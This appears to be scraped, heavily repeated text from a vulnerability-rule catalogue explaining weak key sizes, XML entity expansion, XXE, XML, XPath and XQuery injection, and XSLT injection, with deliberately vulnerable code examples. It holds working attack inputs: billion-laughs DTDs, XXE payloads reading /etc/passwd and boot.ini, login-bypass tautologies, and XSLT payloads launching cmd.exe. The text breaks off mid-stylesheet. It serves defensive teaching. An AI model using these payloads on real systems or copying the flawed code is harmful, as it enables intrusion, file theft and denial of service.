...
RSACryptoServiceProvider rsa1 = new RSACryptoServiceProvider(Convert.ToInt32(tx.Text));
...
Example 1 will run successfully, but anyone who can get to this functionality will be able to manipulate the key size parameter to the encryption algorithm by modifying the textbox value tx.Text. After the program ships, it can be nontrivial to undo an issue regarding user-controlled key sizes, as it is extremely difficult to know if a malicious user determined the key size of a given encryption operation.
...
rsa.GenerateKey(random, user_input)
...
Example 1 will run successfully, but anyone who can get to this functionality will be able to manipulate the key size parameter to the encryption algorithm since the variable user_input can be controlled by the user. After a software release, it can be nontrivial to undo an issue regarding user-controlled key sizes. It is extremely difficult to know if a malicious user-controlled the key size of a given encryption operation.
...
Properties prop = new Properties();
prop.load(new FileInputStream("config.properties"));
String keySize = prop.getProperty("keySize");
...
PBEKeySpec spec = new PBEKeySpec(
password.toCharArray(),
saltBytes,
pswdIterations,
Integer.parseInt(keySize)
);
SecretKey secretKey = factory.generateSecret(spec);
SecretKeySpec secret = new SecretKeySpec(secretKey.getEncoded(), "AES");
...
Example 1 will run successfully, but anyone who can get to this functionality will be able to manipulate the key size parameter to the encryption algorithm by modifying the property keySize. After the program ships, it can be nontrivial to undo an issue regarding user-controlled key sizes, as it is extremely difficult to know if a malicious user determined the key size of a given encryption operation.
...
@property (strong, nonatomic) IBOutlet UITextField *inputTextField;
...
CCCrypt(kCCEncrypt,
kCCAlgorithmAES,
kCCOptionPKCS7Padding,
key,
sizeof(_inputTextField.text),
iv,
plaintext,
sizeof(plaintext),
ciphertext,
sizeof(ciphertext),
&numBytesEncrypted);
...
Example 1 will run successfully, but anyone who can get to this functionality will be able to manipulate the key size parameter to the encryption algorithm by modifying the text in the UITextField inputTextField. After the program ships, it can be nontrivial to undo an issue regarding user-controlled key sizes, as it is extremely difficult to know if a malicious user determined the key size of a given encryption operation.
...
$hash = hash_pbkdf2('sha256', $password, $random_salt, 100000, strlen($password));
...
Example 1 will run successfully, but anyone who can get to this functionality will be able to manipulate the key size parameter to the encryption algorithm since the variable user_input can be controlled by the user. After the program ships, it can be nontrivial to undo an issue regarding user-controlled key sizes, as it is extremely difficult to know if a malicious user determined the key size of a given encryption operation.
...
dk = hashlib.pbkdf2_hmac('sha256', password, random_salt, 100000, dklen=user_input)
...
Example 1 will run successfully, but anyone who can get to this functionality will be able to manipulate the key size parameter to the encryption algorithm since the variable user_input can be controlled by the user. After the program ships, it can be nontrivial to undo an issue regarding user-controlled key sizes, as it is extremely difficult to know if a malicious user determined the key size of a given encryption operation.
...
dk = OpenSSL::PKCS5.pbkdf2_hmac(password, random_salt, 100000, user_input, digest)
...
Example 1 will run successfully, but anyone who can get to this functionality will be able to manipulate the key size parameter to the encryption algorithm since the variable user_input can be controlled by the user. After the program ships, it can be nontrivial to undo an issue regarding user-controlled key sizes, as it is extremely difficult to know if a malicious user determined the key size of a given encryption operation.
...
@IBOutlet weak var inputTextField : UITextField!
...
let key = (inputTextField.text as NSString).dataUsingEncoding(NSUTF8StringEncoding)
let keyPointer = UnsafePointer<UInt8>(key.bytes)
let keyLength = size_t(key.length)
...
let operation : CCOperation = UInt32(kCCEncrypt)
let algoritm : CCAlgorithm = UInt32(kCCAlgorithmAES128)
let options : CCOptions = UInt32(kCCOptionPKCS7Padding)
var numBytesEncrypted :size_t = 0
CCCrypt(operation,
algorithm,
options,
keyPointer,
keyLength,
iv,
plaintextPointer,
plaintextLength,
ciphertextPointer,
ciphertextLength,
&numBytesEncrypted)
...
Example 1 will run successfully, but anyone who can get to this functionality will be able to manipulate the key size parameter to the encryption algorithm by modifying the text in the UITextField inputTextField. After the program ships, it can be nontrivial to undo an issue regarding user-controlled key sizes, as it is extremely difficult to know if a malicious user determined the key size of a given encryption operation.MessageProtectionOrder attribute allows you to specify the order in which signatures and encryption are applied (and whether or not the signatures should be encrypted). Setting the MessageProtectionOrder attribute to anything other than SignBeforeEncryptAndEncryptSignature constitutes a potential security problem.SignBeforeEncryptAndEncryptSignature and their associated problems.<authorization> tag can result in privilege escalation or anonymous access.<authorization> element specifies a list of authorization rules. If an <authorization> element exists and no rules apply to a sender, access is denied [1].<authorization> tag exists in the identified configuration file and anonymous access might be possible.
<policies xmlns="http://schemas.microsoft.com/wse/2005/06/policy">
...
<protection>
<fault signatureOptions="IncludeAddressing, IncludeSoapBody" encryptBody="true" />
<policies xmlns="http://schemas.microsoft.com/wse/2005/06/policy">
...
<protection>
<request signatureOptions="IncludeAddressing, IncludeSoapBody" encryptBody="true" />
<policies xmlns="http://schemas.microsoft.com/wse/2005/06/policy">
...
<protection>
<response signatureOptions="IncludeAddressing, IncludeSoapBody" encryptBody="true" />
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
...
DATA(ixml) = cl_ixml=>create( ).
DATA(stream_factory) = ixml->create_stream_factory( ).
istream = stream_factory->create_istream_string(
`<?xml version="1.0" encoding="UTF-8"?> ` &&
`<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> ` &&
`<stockCheck>&xxe;</stockCheck>` ).
istream->set_dtd_restriction( level = 0 ).
DATA(document) = ixml->create_document( ).
parser = ixml->create_parser(
stream_factory = stream_factory
istream = istream
document = document ).
parser->set_validating( mode = `0` ).
DATA(rc) = parser->parse( ).
...
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/winnt/win.ini" >]><foo>&xxe;</foo>
- (void) parseSomeXML: (NSString *) rawXml {
BOOL success;
NSData *rawXmlConvToData = [rawXml dataUsingEncoding:NSUTF8StringEncoding];
NSXMLParser *myParser = [[NSXMLParser alloc] initWithData:rawXmlConvToData];
[myParser setShouldResolveExternalEntities:YES];
[myParser setDelegate:self];
}
rawXml such that the XML looks like the following:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
boot.ini file.
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///dev/random" >]><foo>&xxe;</foo>
String xml = "...";
...
try {
SAXParserFactory factory = SAXParserFactory.newInstance();
SAXParser saxParser = factory.newSAXParser();
DefaultHandler handler = new DefaultHandler() {
@Override
public void characters(char[] ch, int start, int length) throws SAXException {
System.out.println(new String(ch, start, length));
}
};
saxParser.parse(new InputSource(new StringReader(xml)), handler);
} catch (Exception e) {
e.printStackTrace();
}
...
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///dev/random" >]><foo>&xxe;</foo>
- (void) parseSomeXML: (NSString *) rawXml {
BOOL success;
NSData *rawXmlConvToData = [rawXml dataUsingEncoding:NSUTF8StringEncoding];
NSXMLParser *myParser = [[NSXMLParser alloc] initWithData:rawXmlConvToData];
[myParser setShouldResolveExternalEntities:YES];
[myParser setDelegate:self];
}
rawXml such that the XML looks like the following:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
boot.ini file.
...
<?php
$goodXML = $_GET["key"];
$doc = simplexml_load_string($goodXml);
echo $doc->testing;
?>
...
Example 2:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
boot.ini file. The attacker may utilize XML elements which are returned to the client to exfiltrate data or obtain information as to the existence of network resources.
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///dev/random" >]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
/etc/passwd and include them into the document.
def readFile() = Action { request =>
val xml = request.cookies.get("doc")
val doc = XMLLoader.loadString(xml)
...
}
func parseXML(xml: String) {
parser = NSXMLParser(data: rawXml.dataUsingEncoding(NSUTF8StringEncoding)!)
parser.delegate = self
parser.shouldResolveExternalEntities = true
parser.parse()
}
rawXml contents such that the XML looks like the following:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
boot.ini file.shoes in following XML:
<order>
<price>100.00</price>
<item>shoes</item>
</order>
shoes with shoes</item><price>1.00</price><item>shoes. The new XML would look like:
<order>
<price>100.00</price>
<item>shoes</item><price>1.00</price><item>shoes</item>
</order>
<price> overrides the value from the first <price> tag. This enables the attacker to purchase a pair of $100 shoes for $1.shoes in following XML.
<order>
<price>100.00</price>
<item>shoes</item>
</order>
shoes with shoes</item><price>1.00</price><item>shoes. The new XML would look like:
<order>
<price>100.00</price>
<item>shoes</item><price>1.00</price><item>shoes</item>
</order>
<price> overrides the value from the first <price> tag. This allows the attacker to purchase a pair of $100 shoes for $1.shoes in following XML.
<order>
<price>100.00</price>
<item>shoes</item>
</order>
shoes with shoes</item><price>1.00</price><item>shoes. The new XML would look like:
<order>
<price>100.00</price>
<item>shoes</item><price>1.00</price><item>shoes</item>
</order>
<price> overrides the value from the first <price> tag. This allows the attacker to purchase a pair of $100 shoes for $1.shoes in following XML:
<order>
<price>100.00</price>
<item>shoes</item>
</order>
shoes with shoes</item><price>1.00</price><item>shoes. The new XML would look like:
<order>
<price>100.00</price>
<item>shoes</item><price>1.00</price><item>shoes</item>
</order>
<price> overrides the value from the first <price> tag. This allows the attacker to purchase a pair of $100 shoes for $1.shoes in following XML.
<order>
<price>100.00</price>
<item>shoes</item>
</order>
shoes with shoes</item><price>1.00</price><item>shoes. The new XML would look like:
<order>
<price>100.00</price>
<item>shoes</item><price>1.00</price><item>shoes</item>
</order>
<price> overrides the value from the first <price> tag. This allows the attacker to purchase a pair of $100 shoes for $1.shoes in the following XML.
<order>
<price>100.00</price>
<item>shoes</item>
</order>
shoes with shoes</item><price>1.00</price><item>shoes. The new XML would look like:
<order>
<price>100.00</price>
<item>shoes</item><price>1.00</price><item>shoes</item>
</order>
shoes in following XML.
<order>
<price>100.00</price>
<item>shoes</item>
</order>
shoes with shoes</item><price>1.00</price><item>shoes. The new XML would look like:
<order>
<price>100.00</price>
<item>shoes</item><price>1.00</price><item>shoes</item>
</order>
<price> overrides the value from the first <price> tag. This allows the attacker to purchase a pair of $100 shoes for $1.shoes in following XML.
<order>
<price>100.00</price>
<item>shoes</item>
</order>
shoes with shoes</item><price>1.00</price><item>shoes. The new XML would look like:
<order>
<price>100.00</price>
<item>shoes</item><price>1.00</price><item>shoes</item>
</order>
<price> overrides the value from the first <price> tag. This allows the attacker to purchase a pair of $100 shoes for $1.
...
<?php
$goodXML = $_GET["key"];
$doc = simplexml_load_string($goodXml);
echo $doc->testing;
?>
...
Example 2:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
boot.ini file. The attacker may utilize XML elements which are returned to the client to exfiltrate data or obtain information as to the existence of network resources.shoes in following XML.
<order>
<price>100.00</price>
<item>shoes</item>
</order>
shoes with shoes</item><price>1.00</price><item>shoes. The new XML would look like:
<order>
<price>100.00</price>
<item>shoes</item><price>1.00</price><item>shoes</item>
</order>
<price> overrides the value from the first <price> tag. This allows the attacker to purchase a pair of $100 shoes for $1.shoes in following XML.
<order>
<price>100.00</price>
<item>shoes</item>
</order>
shoes with shoes</item><price>1.00</price><item>shoes. The new XML would look like:
<order>
<price>100.00</price>
<item>shoes</item><price>1.00</price><item>shoes</item>
</order>
<price> overrides the value from the first <price> tag. This allows the attacker to purchase a pair of $100 shoes for $1.shoes in following XML.
<order>
<price>100.00</price>
<item>shoes</item>
</order>
shoes with shoes</item><price>1.00</price><item>shoes. The new XML would look like:
<order>
<price>100.00</price>
<item>shoes</item><price>1.00</price><item>shoes</item>
</order>
<price> overrides the value from the first <price> tag. This allows the attacker to purchase a pair of $100 shoes for $1.shoes in the following XML.
<order>
<price>100.00</price>
<item>shoes</item>
</order>
shoes with shoes</item><price>1.00</price><item>shoes. The new XML would look like:
<order>
<price>100.00</price>
<item>shoes</item><price>1.00</price><item>shoes</item>
</order>
<price> overrides the value from the first <price> tag. This allows the attacker to purchase a pair of $100 shoes for $1.a:t tag from the following Open XML document.
<a:t>YoY results: up 10%</a:t>
...
string acctID = Request["acctID"];
string query = null;
if(acctID != null) {
StringBuffer sb = new StringBuffer("/accounts/account[acctID='");
sb.append(acctID);
sb.append("']/email/text()");
query = sb.toString();
}
XPathDocument docNav = new XPathDocument(myXml);
XPathNavigator nav = docNav.CreateNavigator();
nav.Evaluate(query);
...
/accounts/account[acctID='1']/email/text()acctID does not contain a single-quote character. If an attacker enters the string 1' or '1' = '1 for acctID, then the query becomes the following:/accounts/account[acctID='1' or '1' = '1']/email/text()1' or '1' = '1 condition causes the where clause to always evaluate to true, so the query becomes logically equivalent to the much simpler query://email/text()
...
NSString *accountStr = account.text;
xmlXPathContextPtr xpathCtx;
NSString *query = @"/accounts/account[actId='" + accountStr + @"']/email/text()";
xpathCtx = xmlXPathNewContext(doc);
/* Evaluate XPath expression */
xmlChar *queryString =
(xmlChar *)[query cStringUsingEncoding:NSUTF8StringEncoding];
xpathObj = xmlXPathEvalExpression(queryString, xpathCtx);
...
/accounts/account[acctID='1']/email/text()acctID does not contain a single-quote character. If an attacker enters the string 1' or '1' = '1 for acctID, then the query becomes the following:/accounts/account[acctID='1' or '1' = '1']/email/text()1' or '1' = '1 condition causes the where clause to always evaluate to true, so the query becomes logically equivalent to the much simpler query://email/text()
query = "/accounts/account[acctID='" & url.acctID & "']/email/text()";
selectedElements = XmlSearch(myxmldoc, query);
/accounts/account[acctID='1']/email/text()acctID does not contain a single-quote character. If an attacker enters the string 1' or '1' = '1 for acctID, then the query becomes the following:/accounts/account[acctID='1' or '1' = '1']/email/text()1' or '1' = '1 condition causes the where clause to always evaluate to true, so the query becomes logically equivalent to the much simpler query://email/text()
...
String acctID = request.getParameter("acctID");
String query = null;
if(acctID != null) {
StringBuffer sb = new StringBuffer("/accounts/account[acctID='");
sb.append(acctID);
sb.append("']/email/text()");
query = sb.toString();
}
DocumentBuilderFactory domFactory = DocumentBuilderFactory.newInstance();
domFactory.setNamespaceAware(true);
DocumentBuilder builder = domFactory.newDocumentBuilder();
Document doc = builder.parse("accounts.xml");
XPathFactory factory = XPathFactory.newInstance();
XPath xpath = factory.newXPath();
XPathExpression expr = xpath.compile(query);
Object result = expr.evaluate(doc, XPathConstants.NODESET);
...
/accounts/account[acctID='1']/email/text()acctID does not contain a single-quote character. If an attacker enters the string 1' or '1' = '1 for acctID, then the query becomes the following:/accounts/account[acctID='1' or '1' = '1']/email/text()1' or '1' = '1 condition causes the where clause to always evaluate to true, so the query becomes logically equivalent to the much simpler query://email/text()
...
NSString *accountStr = account.text;
xmlXPathContextPtr xpathCtx;
NSString *query = @"/accounts/account[actId='" + accountStr + @"']/email/text()";
xpathCtx = xmlXPathNewContext(doc);
/* Evaluate XPath expression */
xmlChar *queryString =
(xmlChar *)[query cStringUsingEncoding:NSUTF8StringEncoding];
xpathObj = xmlXPathEvalExpression(queryString, xpathCtx);
...
/accounts/account[acctID='1']/email/text()acctID does not contain a single-quote character. If an attacker enters the string 1' or '1' = '1 for acctID, then the query becomes the following:/accounts/account[acctID='1' or '1' = '1']/email/text()1' or '1' = '1 condition causes the where clause to always evaluate to true, so the query becomes logically equivalent to the much simpler query://email/text()
...
<?php
load('articles.xml');
$xpath = new DOMXPath($doc);
$emailAddrs = $xpath->query("/accounts/account[acctID='" . $_GET["test1"] . "']/email/text()");
//$arts = $xpath->evaluate("/accounts/account[acctID='" . $_GET["test1"] . "']/email/text()")
foreach ($emailAddrs as $email)
{
echo $email->nodeValue."";
}
?>
...
/accounts/account[acctID='1']/email/text()acctID does not contain a single-quote character. If an attacker enters the string 1' or '1' = '1 for acctID, then the query becomes the following:/accounts/account[acctID='1' or '1' = '1']/email/text()1' or '1' = '1 condition causes the where clause to always evaluate to true, so the query becomes logically equivalent to the much simpler query://email/text()
...
tree = etree.parse('articles.xml')
emailAddrs = "/accounts/account[acctID=" + request.GET["test1"] + "]/email/text()"
r = tree.xpath(emailAddrs)
...
/accounts/account[acctID='1']/email/text()acctID does not contain a single-quote character. If an attacker enters the string 1' or '1' = '1 for acctID, then the query becomes the following:/accounts/account[acctID='1' or '1' = '1']/email/text()1' or '1' = '1 condition causes the where clause to always evaluate to true, so the query becomes logically equivalent to the much simpler query://email/text()
...
String squery = "for \$user in doc(users.xml)//user[username='" + Request["username"] + "'and pass='" + Request["password"] + "'] return \$user";
Processor processor = new Processor();
XdmNode indoc = processor.NewDocumentBuilder().Build(new Uri(Server.MapPath("users.xml")));
StreamReader query = new StreamReader(squery);
XQueryCompiler compiler = processor.NewXQueryCompiler();
XQueryExecutable exp = compiler.Compile(query.ReadToEnd());
XQueryEvaluator eval = exp.Load();
eval.ContextItem = indoc;
Serializer qout = new Serializer();
qout.SetOutputProperty(Serializer.METHOD, "xml");
qout.SetOutputProperty(Serializer.DOCTYPE_PUBLIC, "-//W3C//DTD XHTML 1.0 Strict//EN");
qout.SetOutputProperty(Serializer.DOCTYPE_SYSTEM, "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd");
qout.SetOutputProperty(Serializer.INDENT, "yes");
qout.SetOutputProperty(Serializer.OMIT_XML_DECLARATION, "no");
qout.SetOutputWriter(Response.Output);
eval.Run(qout);
...
for \$user in doc(users.xml)//user[username='test_user' and pass='pass123'] return \$userusername or password does not contain a single-quote character. If an attacker enters the string admin' or 1=1 or ''=' for username, then the query becomes the following:for \$user in doc(users.xml)//user[username='admin' or 1=1 or ''='' and password='x' or ''=''] return \$useradmin' or 1=1 or ''=' condition causes the XQuery expression to always evaluate to true, so the query becomes logically equivalent to the much simpler query://user[username='admin']
...
XQDataSource xqs = new XQDataSource();
XQConnection conn = xqs.getConnection();
String query = "for \$user in doc(users.xml)//user[username='" + request.getParameter("username") + "'and pass='" + request.getParameter("password") + "'] return \$user";
XQPreparedExpression xqpe = conn.prepareExpression(query);
XQResultSequence rs = xqpe.executeQuery();
...
for \$user in doc(users.xml)//user[username='test_user' and pass='pass123'] return \$userusername or password does not contain a single-quote character. If an attacker enters the string admin' or 1=1 or ''=' for username, then the query becomes the following:for \$user in doc(users.xml)//user[username='admin' or 1=1 or ''='' and password='x' or ''=''] return \$useradmin' or 1=1 or ''=' condition causes the XQuery expression to always evaluate to true, so the query becomes logically equivalent to the much simpler query://user[username='admin']
...
$memstor = InMemoryStore::getInstance();
$z = Zorba::getInstance($memstor);
try {
// get data manager
$dataman = $z->getXmlDataManager();
// load external XML document
$dataman->loadDocument('users.xml', file_get_contents('users.xml'));
// create and compile query
$express =
"for \$user in doc(users.xml)//user[username='" . $_GET["username"] . "'and pass='" . $_GET["password"] . "'] return \$user"
$query = $zorba->compileQuery($express);
// execute query
$result = $query->execute();
?>
...
for \$user in doc(users.xml)//user[username='test_user' and pass='pass123'] return \$userusername or password does not contain a single-quote character. If an attacker enters the string admin' or 1=1 or ''=' for username, then the query becomes the following:for \$user in doc(users.xml)//user[username='admin' or 1=1 or ''='' and password='x' or ''=''] return \$useradmin' or 1=1 or ''=' condition causes the XQuery expression to always evaluate to true, so the query becomes logically equivalent to the much simpler query://user[username='admin']
...
String xmlUrl = Request["xmlurl"];
String xslUrl = Request["xslurl"];
XslCompiledTransform xslt = new XslCompiledTransform();
xslt.Load(xslUrl);
xslt.Transform(xmlUrl, "books.html");
...
Example 1 results in three different exploits when the attacker passes the identified XSL to the XSTL processor:
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<script>alert(123)</script>
</xsl:template>
</xsl:stylesheet>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<xsl:copy-of select="document('file:///c:/winnt/win.ini')"/>
</xsl:template>
</xsl:stylesheet>
/etc/passwd file.
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:App="http://www.tempuri.org/App">
<msxsl:script implements-prefix="App" language="C#">
<![CDATA[
public string ToShortDateString(string date)
{
System.Diagnostics.Process.Start("cmd.exe");
return "01/01/2001";
}
]]>
</msxsl:script>
<xsl:template match="ArrayOfTest">
<TABLE>
<xsl:for-each select="Test">
<TR>
<TD>
<xsl:value-of select="App:ToShortDateString(TestDate)" />
</TD>
</TR>
</xsl:for-each>
</TABLE>
</xsl:template>
</xsl:stylesheet>
...
InputStream xmlUrl = Utils.getFromURL(request.getParameter("xmlurl"));
InputStream xsltUrl = Utils.getFromURL(request.getParameter("xslurl"));
Source xmlSource = new StreamSource(xmlUrl);
Source xsltSource = new StreamSource(xsltUrl);
Result result = new StreamResult(System.out);
TransformerFactory transFact = TransformerFactory.newInstance();
Transformer trans = transFact.newTransformer(xsltSource);
trans.transform(xmlSource, result);
...
Example 1 results in three different exploits when the attacker passes the identified XSL to the XSTL processor:
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<script>alert(123)</script>
</xsl:template>
</xsl:stylesheet>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<xsl:copy-of select="document('/etc/passwd')"/>
</xsl:template>
</xsl:stylesheet>
/etc/passwd file.
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object">
<xsl:template match="/">
<xsl:variable name="rtobject" select="rt:getRuntime()"/>
<xsl:variable name="process" select="rt:exec($rtobject,'ls')"/>
<xsl:variable name="processString" select="ob:toString($process)"/>
<xsl:value-of select="$processString"/>
</xsl:template>
</xsl:stylesheet>
...
<?php
$xml = new DOMDocument;
$xml->load('local.xml');
$xsl = new DOMDocument;
$xsl->load($_GET['key']);
$processor = new XSLTProcessor;
$processor->registerPHPFunctions();
$processor->importStyleSheet($xsl);
echo $processor->transformToXML($xml);
?>
...
Example 1 results in three different exploits when the attacker passes the identified XSL to the XSTL processor:
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<xsl:template match="/">
<script>alert(123)</script>
</xsl:template>
</xsl:stylesheet>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<xsl:template match="/">
